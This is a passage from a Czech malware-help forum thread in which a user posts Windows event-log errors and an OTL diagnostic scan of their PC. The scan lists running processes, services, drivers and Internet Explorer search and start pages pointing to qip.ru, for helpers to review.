Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 8:41:59 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 8:42:03 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 8:43:47 | Computer Name = Lobo-PC | Source = Service Control Manager | ID = 7000
Description = Služba Služba Google Update (gupdate) neuspěla při spuštění v důsledku
následující chyby: %%2

Error - 9.12.2014 9:06:11 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 9:06:19 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.


< End of report >
Nahoru
chvostik
Návštěvník
Návštěvník
Příspěvky: 31
Registrován: 04 dub 2008 17:37

Re: Malware - prosim o kontrolu logu

#4 Příspěvek od chvostik »

OTL logfile created on: 9.12.2014 17:34:27 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Lobo\Desktop
64bit- Ultimate Edition (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.7600.16385)
Locale: 00000405 | Country: Česká republika | Language: CSY | Date Format: d.M.yyyy

4,00 Gb Total Physical Memory | 2,14 Gb Available Physical Memory | 53,53% Memory free
7,99 Gb Paging File | 4,61 Gb Available in Paging File | 57,73% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 55,89 Gb Total Space | 9,14 Gb Free Space | 16,35% Space Free | Partition Type: NTFS
Drive D: | 1863,01 Gb Total Space | 848,85 Gb Free Space | 45,56% Space Free | Partition Type: NTFS
Drive E: | 465,75 Gb Total Space | 23,48 Gb Free Space | 5,04% Space Free | Partition Type: NTFS
Drive F: | 74,52 Gb Total Space | 5,05 Gb Free Space | 6,77% Space Free | Partition Type: NTFS
Drive G: | 2,92 Gb Total Space | 0,00 Gb Free Space | 0,00% Space Free | Partition Type: UDF
Drive H: | 3,31 Gb Total Space | 0,00 Gb Free Space | 0,00% Space Free | Partition Type: UDF

Computer Name: LOBO-PC | User Name: Lobo | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 7 Days

========== Processes (SafeList) ==========

PRC - [2014.12.09 17:30:53 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Lobo\Desktop\OTL.exe
PRC - [2014.11.26 14:14:24 | 001,880,752 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe
PRC - [2014.11.21 06:12:56 | 000,969,016 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
PRC - [2014.11.21 06:12:54 | 001,871,160 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
PRC - [2014.11.21 06:12:46 | 007,229,752 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
PRC - [2014.11.18 21:23:36 | 001,519,808 | ---- | M] (Valve Corporation) -- D:\Steam\bin\steamwebhelper.exe
PRC - [2014.11.18 21:23:34 | 001,940,160 | ---- | M] (Valve Corporation) -- D:\Steam\Steam.exe
PRC - [2014.11.11 00:49:31 | 000,275,568 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
PRC - [2014.09.12 10:43:06 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014.08.13 11:21:08 | 003,596,752 | ---- | M] (Check Point Software Technologies Ltd.) -- C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe
PRC - [2014.08.13 11:19:52 | 000,137,352 | ---- | M] (Check Point Software Technologies Ltd.) -- C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe
PRC - [2014.08.13 10:16:12 | 000,096,272 | ---- | M] (Check Point Software Technologies, Ltd.) -- C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZAPrivacyService.exe
PRC - [2014.08.08 09:34:04 | 022,734,160 | ---- | M] (Google) -- C:\Program Files (x86)\Google\Drive\googledrivesync.exe
PRC - [2014.05.27 13:58:30 | 002,139,328 | ---- | M] (Comodo Security Solutions, Inc.) -- C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe
PRC - [2014.01.23 10:03:10 | 001,335,344 | ---- | M] (pdfforge GmbH) -- C:\Program Files (x86)\PDF Architect\HelperService.exe
PRC - [2014.01.23 10:03:06 | 000,856,112 | ---- | M] (pdfforge GmbH) -- C:\Program Files (x86)\PDF Architect\ConversionService.exe
PRC - [2013.12.17 11:38:33 | 005,341,536 | ---- | M] (TeamViewer GmbH) -- C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
PRC - [2013.10.08 06:46:47 | 000,175,016 | ---- | M] (Oracle Corporation) -- C:\Program Files (x86)\Java\jre7\bin\javaw.exe
PRC - [2013.07.02 08:16:32 | 000,507,264 | ---- | M] (Oracle Corporation) -- C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
PRC - [2013.03.21 14:19:46 | 001,341,664 | ---- | M] (ESET) -- C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe
PRC - [2013.03.15 06:53:06 | 001,266,464 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
PRC - [2013.03.14 21:07:46 | 000,383,264 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
PRC - [2011.03.04 12:45:08 | 001,529,856 | ---- | M] (Cisco Systems, Inc.) -- C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe
PRC - [2009.08.24 13:38:06 | 000,068,136 | ---- | M] () -- C:\Program Files (x86)\Gigabyte\EasySaver\essvr.exe
PRC - [2009.07.14 02:14:47 | 000,164,864 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Windows Media Player\wmplayer.exe
PRC - [2009.01.12 13:15:52 | 000,071,096 | ---- | M] () -- C:\Program Files (x86)\Blaze Media Pro\NMSAccess32.exe
PRC - [2007.07.18 01:58:22 | 000,229,446 | ---- | M] (Invensys Systems, Inc.) -- C:\Program Files (x86)\Common Files\ArchestrA\aaLogger.exe
PRC - [2005.05.05 00:43:04 | 000,040,960 | ---- | M] (Invensys Systems, Inc.) -- C:\Program Files (x86)\Common Files\ArchestrA\slssvc.exe
PRC - [2005.01.12 19:37:28 | 000,032,845 | ---- | M] (Wonderware Corporation) -- C:\Program Files (x86)\Common Files\ArchestrA\NTServApp.exe


========== Modules (No Company Name) ==========

MOD - [2014.12.09 13:42:02 | 000,027,136 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\_multiprocessing.pyd
MOD - [2014.12.09 13:42:02 | 000,007,168 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\hashobjs_ext.pyd
MOD - [2014.12.09 13:42:01 | 001,160,704 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\_ssl.pyd
MOD - [2014.12.09 13:42:01 | 001,062,400 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._controls_.pyd
MOD - [2014.12.09 13:42:01 | 000,811,008 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._windows_.pyd
MOD - [2014.12.09 13:42:01 | 000,805,888 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._gdi_.pyd
MOD - [2014.12.09 13:42:01 | 000,713,216 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\_hashlib.pyd
MOD - [2014.12.09 13:42:01 | 000,686,080 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\unicodedata.pyd
MOD - [2014.12.09 13:42:01 | 000,110,080 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\PyWinTypes27.dll
MOD - [2014.12.09 13:42:01 | 000,070,656 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._html2.pyd
MOD - [2014.12.09 13:42:01 | 000,038,912 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32inet.pyd
MOD - [2014.12.09 13:42:01 | 000,025,600 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32pdh.pyd
MOD - [2014.12.09 13:42:01 | 000,024,064 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32pipe.pyd
MOD - [2014.12.09 13:42:01 | 000,018,432 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32event.pyd
MOD - [2014.12.09 13:42:01 | 000,010,240 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\select.pyd
MOD - [2014.12.09 13:42:00 | 001,175,040 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._core_.pyd
MOD - [2014.12.09 13:42:00 | 000,557,056 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\pysqlite2._sqlite.pyd
MOD - [2014.12.09 13:42:00 | 000,525,640 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\windows._lib_cacheinvalidation.pyd
MOD - [2014.12.09 13:42:00 | 000,364,544 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\pythoncom27.dll
MOD - [2014.12.09 13:42:00 | 000,320,512 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32com.shell.shell.pyd
MOD - [2014.12.09 13:42:00 | 000,167,936 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32gui.pyd
MOD - [2014.12.09 13:42:00 | 000,128,512 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\_elementtree.pyd
MOD - [2014.12.09 13:42:00 | 000,127,488 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\pyexpat.pyd
MOD - [2014.12.09 13:42:00 | 000,119,808 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32file.pyd
MOD - [2014.12.09 13:42:00 | 000,108,544 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32security.pyd
MOD - [2014.12.09 13:42:00 | 000,098,816 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32api.pyd
MOD - [2014.12.09 13:42:00 | 000,087,552 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\_ctypes.pyd
MOD - [2014.12.09 13:42:00 | 000,078,336 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._animate.pyd
MOD - [2014.12.09 13:42:00 | 000,045,568 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\_socket.pyd
MOD - [2014.12.09 13:42:00 | 000,022,528 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32ts.pyd
MOD - [2014.12.09 13:42:00 | 000,017,408 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32profile.pyd
MOD - [2014.12.09 13:41:59 | 000,735,232 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._misc_.pyd
MOD - [2014.12.09 13:41:59 | 000,122,368 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\wx._wizard.pyd
MOD - [2014.12.09 13:41:59 | 000,035,840 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32process.pyd
MOD - [2014.12.09 13:41:59 | 000,011,264 | ---- | M] () -- C:\Users\Lobo\AppData\Local\Temp\_MEI32842\win32crypt.pyd
MOD - [2014.11.26 14:14:23 | 016,841,392 | ---- | M] () -- C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll
MOD - [2014.11.18 21:23:50 | 002,227,904 | ---- | M] () -- D:\Steam\video.dll
MOD - [2014.11.18 21:23:34 | 000,690,880 | ---- | M] () -- D:\Steam\bin\chromehtml.dll
MOD - [2014.11.11 19:48:12 | 001,171,456 | ---- | M] () -- D:\Steam\libavcodec-56.dll
MOD - [2014.11.11 19:48:12 | 000,485,888 | ---- | M] () -- D:\Steam\libswscale-3.dll
MOD - [2014.11.11 19:48:12 | 000,442,368 | ---- | M] () -- D:\Steam\libavutil-54.dll
MOD - [2014.11.11 19:48:12 | 000,403,968 | ---- | M] () -- D:\Steam\libavformat-56.dll
MOD - [2014.11.11 19:48:12 | 000,332,800 | ---- | M] () -- D:\Steam\libavresample-2.dll
MOD - [2014.11.11 19:48:04 | 034,589,888 | ---- | M] () -- D:\Steam\bin\libcef.dll
MOD - [2014.11.11 19:48:02 | 000,837,824 | ---- | M] () -- D:\Steam\bin\ffmpegsumo.dll
MOD - [2014.11.11 19:47:56 | 000,774,656 | ---- | M] () -- D:\Steam\SDL2.dll
MOD - [2014.11.11 00:49:30 | 003,649,648 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2013.03.07 19:00:00 | 003,501,056 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\ffdshow\ffdshow.ax
MOD - [2013.02.10 19:52:48 | 007,834,946 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV\avcodec-lav-54.dll
MOD - [2013.02.10 19:52:48 | 001,251,150 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV\avformat-lav-54.dll
MOD - [2013.02.10 19:52:48 | 000,379,254 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV\swscale-lav-2.dll
MOD - [2013.02.10 19:52:48 | 000,242,190 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV\avutil-lav-52.dll
MOD - [2013.02.10 19:52:48 | 000,164,666 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV\avfilter-lav-3.dll
MOD - [2013.02.10 19:52:48 | 000,159,427 | ---- | M] () -- C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV\avresample-lav-1.dll
MOD - [2007.02.26 21:13:34 | 006,963,712 | ---- | M] () -- C:\Program Files (x86)\Blaze Media Pro\DVD Ripper\videotrans.dll
MOD - [2007.02.26 21:13:34 | 000,452,608 | ---- | M] () -- C:\Program Files (x86)\Blaze Media Pro\DVD Ripper\videoformat.dll
MOD - [2007.02.26 21:13:32 | 000,019,456 | ---- | M] () -- C:\Program Files (x86)\Blaze Media Pro\DVD Ripper\videocore.dll


========== Services (SafeList) ==========

SRV:64bit: - [2013.03.21 14:19:46 | 001,341,664 | ---- | M] (ESET) [Auto | Running] -- C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe -- (ekrn)
SRV:64bit: - [2009.07.14 02:41:27 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2009.07.14 02:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV:64bit: - [2007.11.07 09:11:22 | 004,466,688 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe -- (msvsmon90)
SRV - [2014.11.26 14:14:25 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014.11.21 06:12:56 | 000,969,016 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2014.11.21 06:12:54 | 001,871,160 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)
SRV - [2014.11.11 00:49:30 | 000,114,288 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014.10.21 20:22:40 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014.09.12 10:43:06 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014.08.13 11:21:08 | 003,596,752 | ---- | M] (Check Point Software Technologies Ltd.) [Auto | Running] -- C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe -- (vsmon)
SRV - [2014.08.13 10:16:12 | 000,096,272 | ---- | M] (Check Point Software Technologies, Ltd.) [Auto | Running] -- C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZAPrivacyService.exe -- (ZAPrivacyService)
SRV - [2014.05.27 13:58:30 | 002,139,328 | ---- | M] (Comodo Security Solutions, Inc.) [Auto | Running] -- C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe -- (DragonUpdater)
SRV - [2014.04.03 19:21:48 | 000,315,008 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014.01.23 10:03:10 | 001,335,344 | ---- | M] (pdfforge GmbH) [Auto | Running] -- C:\Program Files (x86)\PDF Architect\HelperService.exe -- (PDF Architect Helper Service)
SRV - [2014.01.23 10:03:06 | 000,856,112 | ---- | M] (pdfforge GmbH) [Auto | Running] -- C:\Program Files (x86)\PDF Architect\ConversionService.exe -- (PDF Architect Service)
SRV - [2013.12.17 11:38:33 | 005,341,536 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe -- (TeamViewer9)
SRV - [2013.03.15 06:53:06 | 001,266,464 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2013.03.14 21:07:46 | 000,383,264 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe -- (Stereo Service)
SRV - [2012.07.09 00:40:10 | 000,104,912 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2011.03.04 12:45:08 | 001,529,856 | ---- | M] (Cisco Systems, Inc.) [Auto | Running] -- C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe -- (CVPND)
SRV - [2009.08.24 13:38:06 | 000,068,136 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\Gigabyte\EasySaver\essvr.exe -- (ES lite Service)
SRV - [2009.06.10 22:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2009.01.12 13:15:52 | 000,071,096 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\Blaze Media Pro\NMSAccess32.exe -- (NMSAccess)
SRV - [2007.07.18 03:42:58 | 000,080,688 | ---- | M] (Invensys Systems, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\ArchestrA\wwnetdde.exe -- (WWNetDDE)
SRV - [2007.07.18 01:58:22 | 000,229,446 | ---- | M] (Invensys Systems, Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\ArchestrA\aaLogger.exe -- (aaLogger)
SRV - [2005.05.05 00:43:04 | 000,040,960 | ---- | M] (Invensys Systems, Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\ArchestrA\slssvc.exe -- (slssvc)
SRV - [2005.01.12 19:37:28 | 000,032,845 | ---- | M] (Wonderware Corporation) [Auto | Running] -- C:\Program Files (x86)\Common Files\ArchestrA\NTServApp.exe -- (FS Service Control)


========== Driver Services (SafeList) ==========

DRV:64bit: - [2014.12.09 17:05:59 | 000,129,752 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys -- (MBAMSwissArmy)
DRV:64bit: - [2014.11.21 06:14:22 | 000,063,704 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mwac.sys -- (MBAMWebAccessControl)
DRV:64bit: - [2014.11.21 06:14:08 | 000,025,816 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)
DRV:64bit: - [2014.08.13 10:16:02 | 000,450,456 | ---- | M] (Check Point Software Technologies Ltd.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\vsdatant.sys -- (Vsdatant)
DRV:64bit: - [2014.06.11 10:09:28 | 000,490,592 | ---- | M] (Kaspersky Lab ZAO) [File_System | System | Running] -- C:\Windows\SysNative\drivers\klif.sys -- (KLIF)
DRV:64bit: - [2014.06.11 10:09:26 | 007,717,984 | ---- | M] (Kaspersky Lab ZAO) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\kl1.sys -- (KL1)
DRV:64bit: - [2013.04.26 10:03:49 | 000,283,200 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:64bit: - [2013.02.14 12:21:06 | 000,058,416 | ---- | M] (ESET) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\epfwwfp.sys -- (epfwwfp)
DRV:64bit: - [2013.02.14 12:21:04 | 000,213,416 | ---- | M] (ESET) [File_System | System | Running] -- C:\Windows\SysNative\drivers\eamonm.sys -- (eamonm)
DRV:64bit: - [2013.01.10 09:25:22 | 000,190,232 | ---- | M] (ESET) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\epfw.sys -- (epfw)
DRV:64bit: - [2013.01.10 09:25:22 | 000,059,440 | ---- | M] (ESET) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\EpfwLWF.sys -- (EpfwLWF)
DRV:64bit: - [2013.01.10 09:25:20 | 000,150,616 | ---- | M] (ESET) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ehdrv.sys -- (ehdrv)
DRV:64bit: - [2012.12.19 06:41:52 | 000,194,488 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvhda64v.sys -- (NVHDA)
DRV:64bit: - [2011.03.04 12:51:50 | 000,306,536 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\CVPNDRVA.sys -- (CVPNDRVA)
DRV:64bit: - [2010.03.22 10:57:20 | 000,347,680 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2010.02.08 08:32:00 | 000,014,992 | ---- | M] (Cisco Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\CVirtA64.sys -- (CVirtA)
DRV:64bit: - [2009.07.14 02:52:21 | 000,106,576 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2009.07.14 02:52:21 | 000,028,752 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2009.07.14 02:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009.07.14 02:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009.07.14 02:47:48 | 000,077,888 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2009.07.14 02:47:48 | 000,023,104 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2009.07.14 02:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009.06.10 21:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009.06.10 21:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009.06.10 21:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009.06.10 21:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2008.11.16 18:39:44 | 000,157,968 | ---- | M] (Deterministic Networks, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\dne64x.sys -- (DNE)
DRV - [2014.12.09 13:41:34 | 000,025,640 | ---- | M] (Windows (R) Server 2003 DDK provider) [Kernel | On_Demand | Running] -- C:\Windows\gdrv.sys -- (gdrv)
DRV - [2013.04.19 14:29:14 | 000,030,528 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\GVTDrv64.sys -- (GVTDrv64)
DRV - [2012.08.01 14:44:04 | 000,014,544 | ---- | M] (OpenLibSys.org) [File_System | On_Demand | Stopped] -- C:\Program Files (x86)\Razer\Razer Game Booster\Driver\WinRing0x64.sys -- (WinRing0_1_2_0)
DRV - [2009.07.14 02:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0



IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://qip.ru
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.qip.ru
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://search.qip.ru/ie
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.qip.ru
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://qip.ru [binary data]
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://search.zonealarm.com/?src=hp&tbi ... tsId=&ver=&
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.qip.ru/ie
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\URLSearchHook: - No CLSID value found
